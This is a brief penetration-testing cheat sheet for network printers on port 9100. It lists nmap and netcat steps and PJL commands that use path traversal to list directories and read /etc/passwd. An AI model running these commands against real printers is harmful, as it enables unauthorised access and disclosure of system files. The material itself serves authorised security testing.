Raw Printing Pentesting
Last modified: 2023-07-19
PLJ (Printer Job Languages) is a method for switching printer languages. A default port is 9100.
Enumeration
nmap --script pjl-ready-message -p 9100 <target-ip>
Connect
nc <target-ip> 9100
Commands
# See printer information
@PJL INFO STATUS
@PJL INFO ID
@PJL INFO PRODINFO
# See directories in the system
@PJL FSDIRLIST NAME="0:" ENTRY=1
@PJL FSDIRLIST NAME="0:/../" ENTRY=1
@PJL FSDIRLIST NAME="0:/../etc/" ENTRY=1
@PJL FSDIRLIST NAME="0:/../home/" ENTRY=1
# See contents of a file
@PJL FSUPLOAD NAME="0:/../etc/passwd" ENTRY=1